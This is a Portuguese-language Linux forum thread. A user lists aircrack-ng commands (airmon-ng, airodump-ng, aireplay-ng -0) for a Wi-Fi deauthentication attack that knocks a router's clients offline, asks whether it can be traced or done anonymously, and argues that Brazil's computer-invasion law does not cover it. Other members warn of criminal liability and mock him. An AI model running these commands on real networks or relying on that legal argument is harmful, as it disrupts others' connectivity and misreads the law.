Attack DDoS Offline no Kali [RESOLVIDO]

ozzutnap
(usa Kali)

Enviado em 08/11/2017 - 13:30h

Pessoal, gostaria de saber se é possível rastrear ataques sofridos no roteador via DDoS.
Comandos para o ataque
airmon-ng
airmon-ng start wlan0
airodump-ng wlan0mon
Depois de encontrar a rede a sofrer o ataque
airodump-ng -c (canal) --bssid (endereço MAC do aparelho) wlan0mon
Depois de analisar somente a rede.
aireplay-ng -0 999999999 (número de requisições a serem enviadas para o aparelho) -a (enderço MAC novamente) wlan0mon
Esse ataque pode ser rastreado ?
Pelo proprietário do aparelho ou pela empresa fornecedora da internet ?
Se sim, oque pode ser detectado ?
Endereço MAC da pessoa que atacou ? IP ? Geolocation ? É possível ficar "anônimo" para realizar tal ataque ??
Enfim, deixa rastros ? Quais ?

ozzutnap
(usa Kali)

Enviado em 08/11/2017 - 15:22h

No seguinte caso, não.
Tenho essa dúvida pois no artigo 154 diz o seguinte
" CP - Decreto Lei nº 2.848 de 07 de Dezembro de 1940

Art. 154 - Revelar alguém, sem justa causa, segredo, de que tem ciência em razão de função, ministério, ofício ou profissão, e cuja revelação possa produzir dano a outrem:

Pena - detenção, de três meses a um ano, ou multa de um conto a dez contos de réis.

Parágrafo único - Somente se procede mediante representação.

Invasão de dispositivo informático (Incluído pela Lei nº 12.737, de 2012) Vigência

Art. 154-A. Invadir dispositivo informático alheio, conectado ou não à rede de computadores, mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar ou destruir dados ou informações sem autorização expressa ou tácita do titular do dispositivo ou instalar vulnerabilidades para obter vantagem ilícita: (Incluído pela Lei nº 12.737, de 2012) Vigência Pena - detenção, de 3 (três) meses a 1 (um) ano, e multa. (Incluído pela Lei nº 12.737, de 2012) Vigência

§ 1º Na mesma pena incorre quem produz, oferece, distribui, vende ou difunde dispositivo ou programa de computador com o intuito de permitir a prática da conduta definida no caput. (Incluído pela Lei nº 12.737, de 2012) Vigência

§ 2º Aumenta-se a pena de um sexto a um terço se da invasão resulta prejuízo econômico. (Incluído pela Lei nº 12.737, de 2012) Vigência

§ 3º Se da invasão resultar a obtenção de conteúdo de comunicações eletrônicas privadas, segredos comerciais ou industriais, informações sigilosas, assim definidas em lei, ou o controle remoto não autorizado do dispositivo invadido: (Incluído pela Lei nº 12.737, de 2012) Vigência Pena - reclusão, de 6 (seis) meses a 2 (dois) anos, e multa, se a conduta não constitui crime mais grave. (Incluído pela Lei nº 12.737, de 2012) Vigência

§ 4º Na hipótese do § 3o, aumenta-se a pena de um a dois terços se houver divulgação, comercialização ou transmissão a terceiro, a qualquer título, dos dados ou informações obtidos. (Incluído pela Lei nº 12.737, de 2012) Vigência

§ 5º Aumenta-se a pena de um terço à metade se o crime for praticado contra: (Incluído pela Lei nº 12.737, de 2012) Vigência

I - Presidente da República, governadores e prefeitos; (Incluído pela Lei nº 12.737, de 2012) Vigência

II - Presidente do Supremo Tribunal Federal; (Incluído pela Lei nº 12.737, de 2012) Vigência

III - Presidente da Câmara dos Deputados, do Senado Federal, de Assembleia Legislativa de Estado, da Câmara Legislativa do Distrito Federal ou de Câmara Municipal; ou (Incluído pela Lei nº 12.737, de 2012) Vigência

IV - dirigente máximo da administração direta e indireta federal, estadual, municipal ou do Distrito Federal. (Incluído pela Lei nº 12.737, de 2012) Vigência Ação penal (Incluído pela Lei nº 12.737, de 2012) Vigência

Art. 154-B. Nos crimes definidos no art. 154-A, somente se procede mediante representacao, salvo se o crime e cometido contra a administracao pública direta ou indireta de qualquer dos Poderes da União, Estados, Distrito Federal ou Municipios ou contra empresas concessionarias de servicos publicos. (Incluido pela Lei nº 12.737, de 2012) Vigencia"



"Invasão de dispositivo informático (Incluído pela Lei nº 12.737, de 2012) Vigência

Art. 154-A. Invadir dispositivo informático alheio, conectado ou não à rede de computadores, mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar ou destruir dados ou informações sem autorização expressa ou tácita do titular do dispositivo ou instalar vulnerabilidades para obter vantagem ilícita: (Incluído pela Lei nº 12.737, de 2012) Vigência Pena - detenção, de 3 (três) meses a 1 (um) ano, e multa. (Incluído pela Lei nº 12.737, de 2012) Vigência"



"Invadir
verbo

1.
transitivo direto
penetrar num determinado lugar e ocupá-lo pela força; apoderar-se, tomar, conquistar; ocupar um lugar de forma maciça e abusiva.
"i. um território"
2.
transitivo direto
alastrar-se por, estender-se por; ganhar, dominar.
"uma moda que logo invadiu o país"

Pelo que eu entendi, esse caso específico não caracterizaria uma invasão, levando em conta o significado do verbo invadir, e levando em conta também de que não estaria usando tal meio para roubar dados, destruir dados, ect...

zezaocapoeira
(usa Slackware)

Enviado em 08/11/2017 - 16:07h

Salve galera.

Vou tentar explicar da maneira mais simples e clara possível.

O seguinte se essa manobra ai foi sem autorização, e o responsável da rede descobrir e protocolar um boletim de ocorrência. A polícia chega ai com um mandado de busca e apreensão e já era, não há choro. E tu poderá responder algum processo judicial posteriormente ou ir em cana ( onde o filho chora e a mãe não vê).

E ainda tudo que for relacionado a delitos na rede de internet dos outros, na região, acontecer pode ter certeza que tu vai ser sempre suspeito, e sempre terá seus equipamentos apreendidos com ordem judicial e se quiser liberar eles terá que ir na justiça.

Se o departamento de polícia quiser te grampear , existem diversos meios.

Vida real é diferente da ficção.

Sabe de nada inocente.

Obrigado pela atenção, salve!!!

ozzutnap
(usa Kali)

Enviado em 08/11/2017 - 17:05h

Entendi em parte, a minha dúvida é sobre os rastros.
Já vi um site que mapeia ataques DDoS do mundo inteiro, um ataque deste tipo poderia ser "mapeado" por assim dizer ? Rastros ficariam no roteador ? O provedor da internet pode ver isso em tempo real ? E uma vez que oque consta escrito no código penal não fala especificamente sobre isso seria mais uma brecha no mesmo ??
E obs: as dúvidas são para aprendizado mesmo, sou iniciante com o linux e vi uma video aula sobre tal coisa no youtube, testei em minha própria rede e funcionou, enquanto o ataque estava sendo lançado nenhum dos meus dispositivos conseguiam acessar a internet, porque isso ocorre ?
Alguém poderia me explicar tudo sobre essa situação ? Quero aprender mais e me aprofundar na área... Procurar falhas, explora-las, etc...

removido
(usa Nenhuma)

Enviado em 08/11/2017 - 18:20h

Sei, aprendizado...

Sério, pra achar um vídeo de um cara ensinando a fazer um ataque DDos, nem imagino o que você procurou no Google.

Isso é sério, e pode dar cadeia. Por que você não aprende um pouco de sistemas Unix e faz um curso sobre isso, já que quer se aprofundar?

#VoltaUrukS2

ozzutnap
(usa Kali)

Enviado em 08/11/2017 - 20:56h

Cara, eu quero aprender tudo que conseguir, hacking, pentest, aprender a programar, tudo... Adquirir conhecimento não é crime !!
Abraços...

lucasdemoraesc
(usa Ubuntu)

Enviado em 08/11/2017 - 21:03h

Sugiro que comece estudando bastante matemática e física...


LMC

removido
(usa Nenhuma)

Enviado em 08/11/2017 - 21:17h

Até pode ser que você queira aprender e não ser um script kiddie, mas depois dessa pergunta deixou dúvidas. Não faça besteira, pode se arrepender.

Se você quer usar esse conhecimento profissionalmente faça um curso! Ou se você quer se tornar um "raquer toddynho cali linuqui", aconselho a desistir. Tem cara que quer se pagar de hackudo usando o Kali mas nem conectar o WI-FI sabe.

Se for por curiosidade e conhecimento, tudo bem. Aconselho a usar a melhor ferramenta de qualquer linuxer, melhor até que o terminal, chamada Google.

#VoltaUrukS2

jovct111
(usa Arch Linux)

Enviado em 09/11/2017 - 00:33h

Mais um que assistiu Mr. Robot.

ozzutnap
(usa Kali)

Enviado em 09/11/2017 - 10:58h

Muito boa a resposta, objetiva, e conseguiu sanar minhas dúvidas, muito obrigado pela atenção, abraços !!!

removido
(usa Nenhuma)

Enviado em 09/11/2017 - 11:05h

Exatamente!
O tópico foi avaliado pela moderação.

Sem conselhos ou ironias. Ou não participem do tópico.
Ok, pessoal ?!